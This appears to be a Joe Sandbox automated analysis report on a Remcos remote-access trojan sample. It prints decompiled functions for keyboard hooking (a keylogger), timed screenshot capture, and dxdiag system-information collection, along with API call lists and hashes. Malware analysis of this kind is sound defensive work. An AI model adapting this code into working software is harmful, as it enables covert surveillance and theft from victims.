_free.LIBCMT ref: 0043D9C5
_free.LIBCMT ref: 0043D9CE
_free.LIBCMT ref: 0043D9DA

Strings

C, xrefs: 0043D7C7
@, xrefs: 0043D957

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C$@
API String ID: 1679612858-1810246019
Opcode ID: 814cefed94de017fc20c25b798886fed7d57c55e6f8e501faadd50f225629064
Instruction ID: 52565f1e93295bb36fd0e3f4fb9911c45a8627ad54808d25164a72537c1ebd07
Opcode Fuzzy Hash: 814cefed94de017fc20c25b798886fed7d57c55e6f8e501faadd50f225629064
Instruction Fuzzy Hash: F1B13775E012199BDB24DF19D885BAEB7B4FF48304F2045AAE849A7351E734AE90CF84

Uniqueness

Uniqueness Score: -1.00%

Function 004152D7, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176
sleeptimeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004152D7() {
				intOrPtr* _t42;
				void* _t45;
				char* _t54;
				void* _t72;
				long _t78;
				void* _t83;
				struct _SECURITY_ATTRIBUTES* _t85;
				struct _SECURITY_ATTRIBUTES* _t92;
				void* _t131;
				void* _t132;
				void* _t140;
				void* _t141;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				E00450918(0x451ece, _t146);
				_push(_t141);
				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
				_t92 = 0;
				 *((intOrPtr*)(_t146 - 4)) = 0;
				_t149 =  *0x46bea0 - _t92; // 0x0
				if(_t149 == 0) {
					_t147 = _t147 - 0xc;
					_t131 = _t146 - 0x68;
					L00413D5E(_t131);
					__imp__GdiplusStartup(0x46bea0, _t131, 0);
				}
				_t150 =  *0x46bd70 - _t92; // 0x0
				if(_t150 == 0) {
					L00401EDA(0x46c880, _t132, _t141, E0041481D(_t146 - 0x40));
					L00401ED0();
				}
				_t42 = L00401F75(L00401E29(0x46c578, _t132, _t150, 0x19));
				_t45 = L00401ECB(L00416C32(_t146 - 0x58, L00401E29(0x46c578, _t132, _t150, 0x1a)));
				_t134 =  *_t42;
				L00401EDA(0x46c868,  *_t42, 0x46c868, E004179B3(_t146 - 0x40,  *_t42, _t45));
				L00401ED0();
				L00401ED0();
				CreateDirectoryW(L00401ECB(0x46c868), _t92);
				L00401F4D(_t92, _t146 - 0xb0);
				L00401F4D(_t92, _t146 - 0x80);
				 *(_t146 - 0x11) = _t92;
				 *0x46bd6b = 1;
				_t54 =  *((intOrPtr*)(_t146 + 8));
				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				_t140 = Sleep;
				L6:
				while(1) {
					if( *_t54 != 1) {
						L11:
						GetLocalTime(_t146 - 0x28);
						_push( *(_t146 - 0x1c) & 0x0000ffff);
						_push( *(_t146 - 0x1e) & 0x0000ffff);
						_push( *(_t146 - 0x20) & 0x0000ffff);
						_push( *(_t146 - 0x22) & 0x0000ffff);
						_push( *(_t146 - 0x26) & 0x0000ffff);
						L00413D37(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
						_t147 = _t147 + 0x20;
						L00401EDA(_t146 - 0x80, _t66, _t145, E00403086(_t92, _t146 - 0x58, E00403086(_t92, _t146 - 0x40, E00407516(_t146 - 0x98, 0x46c868, __eflags, "\\"), _t140, __eflags, _t146 - 0x2b8), _t140, __eflags, "."));
						L00401ED0();
						L00401ED0();
						L00401ED0();
						_t72 = L00401ECB(_t146 - 0x80);
						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
						E0041510D(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
						if(__eflags != 0) {
							_t92 = 0;
							 *(_t146 - 0x11) = 0;
							_t78 = E00436079(_t75, L00401F75(L00401E29(0x46c578, _t134, __eflags, 0x18))) * 0x3e8;
							__eflags = _t78;
						} else {
							_t78 = E00436079(_t79, L00401F75(L00401E29(0x46c578, _t134, __eflags, 0x15))) * 0xea60;
						}
						Sleep(_t78);
						_t54 =  *((intOrPtr*)(_t146 + 8));
						continue;
					}
					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
					while(1) {
						_t153 = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						_t83 = L00401F75(L00401E29(0x46c578, _t134, _t153, 0x17));
						_t148 = _t147 - 0x18;
						E0040425F(_t92, _t148, _t83);
						_t85 = E00417417(0, _t134);
						_t147 = _t148 + 0x18;
						_t92 = _t85;
						 *(_t146 - 0x11) = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						Sleep(0x3e8);
					}
					goto L11;
				}
			}

0x004152dc
0x004152e8
0x004152ea
0x004152ed
0x004152ef
0x004152f2
0x004152f8
0x004152fa
0x004152fd
0x00415300
0x0041530e
0x0041530e
0x00415314
0x0041531a
0x0041532a
0x00415332
0x00415332
0x00415347
0x00415363
0x00415369
0x0041537c
0x00415384
0x0041538c
0x0041539a
0x004153a6
0x004153ae
0x004153b3
0x004153b6
0x004153c7
0x004153cd
0x004153d0
0x004153d3
0x00000000
0x004153d9
0x004153dc
0x00415424
0x00415428
0x00415432
0x00415437
0x0041543c
0x00415441
0x00415446
0x00415454
0x00415459
0x00415498
0x004154a0
0x004154a8
0x004154b3
0x004154bb
0x004154c3
0x004154c8
0x004154d5
0x004154d8
0x004154f6
0x004154f8
0x0041550f
0x0041550f
0x004154da
0x004154ee
0x004154ee
0x00415517
0x00415519
0x00000000
0x00415519
0x004153de
0x004153e3
0x004153e6
0x004153e6
0x004153e8
0x00000000
0x00000000
0x004153f8
0x004153fd
0x00415403
0x0041540a
0x0041540f
0x00415412
0x00415414
0x00415419
0x00000000
0x00000000
0x00415420
0x00415420
0x00000000
0x004153e6

APIs

__EH_prolog.LIBCMT ref: 004152DC
GdiplusStartup.GDIPLUS(0046BEA0,?,00000000), ref: 0041530E

Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531

Part of subcall function 0041510D: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 00415166
Part of subcall function 0041510D: DeleteFileW.KERNEL32(00000000,0000001B), ref: 004151F7

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041539A
Sleep.KERNEL32(000003E8), ref: 00415420
GetLocalTime.KERNEL32(?), ref: 00415428
Sleep.KERNEL32(00000000,00000018,00000000), ref: 00415517

Strings

time_%04i%02i%02i_%02i%02i%02i, xrefs: 004153C2
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 004153BD, 004153DE, 0041544C

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimechar_traits
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 3280235481-3790400642
Opcode ID: 8349f92d13f2aa44021425eb9252c670646693aecc0763b09327103a67e254ea
Instruction ID: 36c87be1b18ce6efe71a969fa5af4a68c9604fdc2ab21ef0b6733f40622ad6ee
Opcode Fuzzy Hash: 8349f92d13f2aa44021425eb9252c670646693aecc0763b09327103a67e254ea
Instruction Fuzzy Hash: 2F518070A001589ACB14BBB6DC52AFE7769AB55309F40003FF845A72E2EF3C5E85C799

Uniqueness

Uniqueness Score: -1.00%

Function 00413012, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00413012(void* __ecx, void* __eflags, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t35;
				void* _t46;
				void* _t54;
				void* _t55;
				void* _t90;
				void* _t92;
				void* _t94;
				void* _t95;

				_t97 = __eflags;
				E00403086(_t54,  &_v76, E0040425F(_t54,  &_v52, E0043918F(_t54, __ecx, __eflags, L"temp")), _t90, _t97, L"\\sysinfo.txt");
				L00401ED0();
				_t55 = 0;
				ShellExecuteW(0, L"open", L"dxdiag", L00401ECB(L00409E6B( &_v52, L"/t ", 0,  &_v76)), 0, 0);
				L00401ED0();
				E004020B5(0,  &_v28);
				_t92 = 0;
				do {
					_t35 = L00401ECB( &_v76);
					_t87 =  &_v28;
					E00417334(_t35,  &_v28);
					Sleep(0x64);
					_t92 = _t92 + 1;
				} while (L00409DB7() != 0 && _t92 < 0x4b0);
				if(L00409DB7() == 0) {
					DeleteFileW(L00401ECB( &_v76));
					E00404818(_t55,  &_v180, 1);
					_t95 = _t94 - 0x10;
					_t93 = 0x46bacc;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t46 = E004049D2(_t87);
					_t102 = _t46;
					if(_t46 != 0) {
						_t93 = _t95 - 0x18;
						L00402F73(_t55, _t95 - 0x18, L00402F97( &_v52,  &_a4, 0x46c238), _t102,  &_v28);
						_push(0x97);
						E00404A6E(_t55,  &_v180, _t49, _t102);
						L00401FA7();
						L00404DD5( &_v180);
						_t55 = 1;
					}
					L00404DF9(_t55,  &_v180, _t93);
				}
				L00401FA7();
				L00401ED0();
				L00401FA7();
				return _t55;
			}

0x00413012
0x0041303c
0x00413045
0x0041304a
0x00413073
0x0041307c
0x00413084
0x00413089
0x0041308b
0x0041308e
0x00413093
0x00413098
0x0041309f
0x004130a8
0x004130ae
0x004130c4
0x004130d3
0x004130e1
0x004130e6
0x004130f1
0x004130f6
0x004130f7
0x004130f8
0x004130f9
0x004130fa
0x004130ff
0x00413101
0x00413109
0x00413121
0x00413127
0x00413132
0x0041313a
0x00413145
0x0041314a
0x0041314a
0x00413152
0x00413152
0x0041315a
0x00413162
0x0041316a
0x00413177

APIs

Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00413073

Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,0041309D), ref: 00417351

Sleep.KERNEL32(00000064), ref: 0041309F
DeleteFileW.KERNEL32(00000000), ref: 004130D3

Strings

\sysinfo.txt, xrefs: 0041301E
/t , xrefs: 00413052
open, xrefs: 0041306D
temp, xrefs: 00413023
dxdiag, xrefs: 00413068

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleepchar_traits
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 2701014334-2001430897
Opcode ID: 23855c4a8f460ea113fa83dd0baacbc17a0c323142c287fa7876f9c92e2ffe53
Instruction ID: ea28d571885b6fcaa569769a0be50a94edd787caab5c3991fe9ce62e94a8c89b
Opcode Fuzzy Hash: 23855c4a8f460ea113fa83dd0baacbc17a0c323142c287fa7876f9c92e2ffe53
Instruction Fuzzy Hash: 3D31BF71910209AACB14FBA1DC92EEE7739AF50349F40007FB905771E2EF781E4AC699

Uniqueness

Uniqueness Score: -1.00%

Function 00408894, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00408894(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				char _v60;
				void* _v64;
				void* __edi;
				int _t7;
				void* _t8;
				struct HHOOK__* _t14;
				void* _t16;
				void* _t22;
				struct HHOOK__** _t34;
				signed int _t36;
				void* _t38;

				_t38 = (_t36 & 0xfffffff8) - 0x38;
				_t34 = __ecx;
				 *0x46baf0 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					goto L3;
				} else {
					_t14 = SetWindowsHookExA(0xd, E0040887D, GetModuleHandleA(0), 0);
					 *_t34 = _t14;
					_t43 = _t14;
					if(_t14 != 0) {
						while(1) {
							L3:
							_t7 = GetMessageA( &_v32, 0, 0, 0);
							__eflags = _t7;
							if(_t7 == 0) {
								break;
							}
							TranslateMessage( &_v32);
							DispatchMessageA( &_v32);
							__eflags =  *_t34;
							if( *_t34 != 0) {
								continue;
							}
							break;
						}
						_t8 = 0;
						__eflags = 0;
					} else {
						_t16 = L00416B7E(_t22,  &_v60, GetLastError());
						_t39 = _t38 - 0x18;
						E004075C4(_t22, _t38 - 0x18, "Keylogger initialization failure: error ", 0, _t43, _t16);
						E00402064(_t22, _t39 - 0x14, "[ERROR]");
						E004165D8(_t22, 0);
						L00401FA7();
						_t8 = 1;
					}
				}
				return _t8;
			}

0x0040889a
0x0040889e
0x004088a3
0x004088ab
0x00000000
0x004088ad
0x004088bd
0x004088c3
0x004088c5
0x004088c7
0x0040890f
0x0040890f
0x00408917
0x0040891d
0x0040891f
0x00000000
0x00000000
0x00408926
0x00408931
0x00408937
0x00408939
0x00000000
0x00000000
0x00000000
0x00408939
0x0040893b
0x0040893b
0x004088c9
0x004088d5
0x004088da
0x004088e5
0x004088f4
0x004088f9
0x00408905
0x0040890c
0x0040890c
0x004088c7
0x00408942

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004088AF
SetWindowsHookExA.USER32 ref: 004088BD
GetLastError.KERNEL32 ref: 004088C9

Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2

GetMessageA.USER32 ref: 00408917
TranslateMessage.USER32(?), ref: 00408926
DispatchMessageA.USER32 ref: 00408931

Strings

[ERROR], xrefs: 004088EF
Keylogger initialization failure: error , xrefs: 004088DD

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error $[ERROR]
API String ID: 3219506041-2451335947
Opcode ID: 8b7723a9b9f20bb4bf98cc200abc2175c0c0fcfe11952c538ad2e14e55692972
Instruction ID: 45d1f3c5768472935d8da96a5f04b23d1a91758f3c86bb8fdf5143b2996172c8
Opcode Fuzzy Hash: 8b7723a9b9f20bb4bf98cc200abc2175c0c0fcfe11952c538ad2e14e55692972
Instruction Fuzzy Hash: 8F119DB25002016BC7207BB69D09C6B77ACEA95752B50053EB885D2191EF38DA04C6AA

Uniqueness

Uniqueness Score: -1.00%

Function 00418680, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418680(void* __eflags) {
				struct tagMSG _v32;
				char _v300;
				int _t14;

				GetModuleFileNameA(0,  &_v300, 0x104);
				 *0x46bec4 = E00418732();
				0x46bec0->cbSize = 0x1fc;
				 *0x46bec8 = 1;
				 *0x46bed0 = 0x401;
				 *0x46bed4 = ExtractIconA(0,  &_v300, 0);
				lstrcpynA(0x46bed8, "Remcos", 0x80);
				 *0x46becc = 7;
				Shell_NotifyIconA(0, 0x46bec0);
				while(1) {
					_t14 = GetMessageA( &_v32, 0, 0, 0);
					if(_t14 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
				}
				return _t14;
			}

0x00418699
0x004186a4
0x004186b2
0x004186bc
0x004186c6
0x004186e5
0x004186ea
0x004186f6
0x00418700
0x0041871c
0x00418723
0x0041872b
0x00000000
0x00000000
0x0041870c
0x00418716
0x00418716
0x00418731

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00418699

Part of subcall function 00418732: RegisterClassExA.USER32(00000030), ref: 0041877E
Part of subcall function 00418732: CreateWindowExA.USER32 ref: 00418799
Part of subcall function 00418732: GetLastError.KERNEL32 ref: 004187A3

ExtractIconA.SHELL32(00000000,?,00000000), ref: 004186D0
lstrcpynA.KERNEL32(0046BED8,Remcos,00000080), ref: 004186EA
Shell_NotifyIconA.SHELL32(00000000,0046BEC0), ref: 00418700
TranslateMessage.USER32(?), ref: 0041870C
DispatchMessageA.USER32 ref: 00418716
GetMessageA.USER32 ref: 00418723

Strings

Remcos, xrefs: 004186DB

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: f64222c40e49cda82ce2febada2467d24727ed5b3ff0689c3ecc630936eb6d21
Instruction ID: 76f610ea089cdd7666bb47ab7eed5b25d2d074ad51cd5b102639d92569b498d2
Opcode Fuzzy Hash: f64222c40e49cda82ce2febada2467d24727ed5b3ff0689c3ecc630936eb6d21
Instruction Fuzzy Hash: 98011EB1900308ABD7109FA1EC0CEDA7BBCFB85747F10006AF615D2161EBF995858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004450E7, Relevance: 13.8, APIs: 9, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E004450E7(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = L00439E01();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(L00439E14())) = 9;
						L59:
						_t145 = E0043626D();
						goto L60;
					}
					__eflags = _t213 -  *0x46ba00; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E0043E61D(_t224, _t158);
								L0043EE85(0);
								L0043EE85(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E0044471C(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E0044D987(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													L00439DDE(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(L00439E14())) = 9;
											 *(L00439E01()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = L00444C43();
												} else {
													_t176 = L00444F53();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = L00444E03(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(L00439E14())) = 0xc;
									 *(L00439E01()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									L0043EE85(_t246);
									return _t242;
								}
							}
							L15:
							 *(L00439E01()) =  *_t206 & _t246;
							 *((intOrPtr*)(L00439E14())) = 0x16;
							E0043626D();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(L00439E01()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(L00439E14())) = 0x16;
					goto L59;
				} else {
					 *(L00439E01()) =  *_t212 & 0x00000000;
					_t145 = L00439E14();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}

0x004450f0
0x004450f7
0x00445111
0x00445113
0x0044547b
0x0044547b
0x00445480
0x00445480
0x00445488
0x0044548e
0x0044548e
0x00000000
0x0044548e
0x00445119
0x0044511f
0x00000000
0x00000000
0x00445127
0x00445133
0x00445136
0x00445139
0x0044513c
0x00445143
0x00445146
0x0044514a
0x0044514d
0x00445150
0x00000000
0x00000000
0x00445156
0x00445159
0x0044515f
0x00445179
0x0044517b
0x00445477
0x00000000
0x00445477
0x00445181
0x00445185
0x00000000
0x00000000
0x0044518b
0x0044518f
0x00000000
0x00000000
0x00445196
0x0044519a
0x0044519d
0x004451a0
0x004451a5
0x004451a5
0x004451a8
0x004451c5
0x004451ca
0x004451cc
0x004451ce
0x004451ee
0x004451ef
0x004451f1
0x004451f4
0x004451f6
0x004451f8
0x004451fa
0x004451fa
0x00445205
0x00445207
0x0044520e
0x00445213
0x00445216
0x00445219
0x0044521b
0x00445240
0x00445245
0x0044524c
0x0044524f
0x00445252
0x00445256
0x00445258
0x0044525c
0x0044525e
0x00445261
0x00445264
0x00445266
0x00445269
0x00445270
0x00445273
0x00445278
0x0044527b
0x00445284
0x00445288
0x0044528b
0x0044528e
0x00445291
0x00445297
0x00445299
0x004452a2
0x004452a5
0x004452a8
0x004452ab
0x004452ac
0x004452b0
0x004452b6
0x004452c0
0x004452c5
0x004452d5
0x004452d9
0x004452dc
0x004452de
0x004452e0
0x004452e2
0x004452e4
0x004452ec
0x004452ed
0x004452f0
0x004452f3
0x004452f4
0x004452fa
0x00445304
0x0044530c
0x0044530f
0x0044531b
0x0044531f
0x00445322
0x00445324
0x00445326
0x00445328
0x0044532a
0x00445332
0x00445333
0x00445336
0x00445339
0x00445339
0x0044533a
0x00445340
0x0044534a
0x0044534a
0x00445328
0x00445324
0x0044530f
0x004452e2
0x004452de
0x004452c5
0x00445299
0x00445291
0x00445350
0x00445356
0x00445358
0x004453cb
0x004453cb
0x004453cf
0x004453df
0x004453e5
0x004453e7
0x00445443
0x00445443
0x0044544b
0x0044544c
0x0044544e
0x00445467
0x0044546a
0x004453a7
0x004453a8
0x00000000
0x004453ad
0x00445470
0x00000000
0x00445470
0x00445455
0x00445460
0x00000000
0x00445460
0x004453e9
0x004453ec
0x004453ef
0x00000000
0x00000000
0x004453f1
0x004453f1
0x004453f4
0x004453f7
0x004453fa
0x00445401
0x00445406
0x00445408
0x0044540c
0x00445427
0x0044542b
0x0044542c
0x0044542f
0x00445430
0x0044543c
0x00445432
0x00445432
0x00445432
0x0044540e
0x0044540e
0x0044540e
0x00445419
0x0044541e
0x00445421
0x00445421
0x00000000
0x00445406
0x0044535d
0x00445360
0x00445367
0x0044536c
0x00000000
0x00000000
0x00445375
0x0044537b
0x0044537d
0x00000000
0x00000000
0x0044537f
0x00445383
0x00000000
0x00000000
0x00445397
0x0044539d
0x0044539f
0x004453c3
0x004453c6
0x00000000
0x004453c6
0x004453a1
0x00000000
0x0044521d
0x00445222
0x0044522d
0x004453ae
0x004453ae
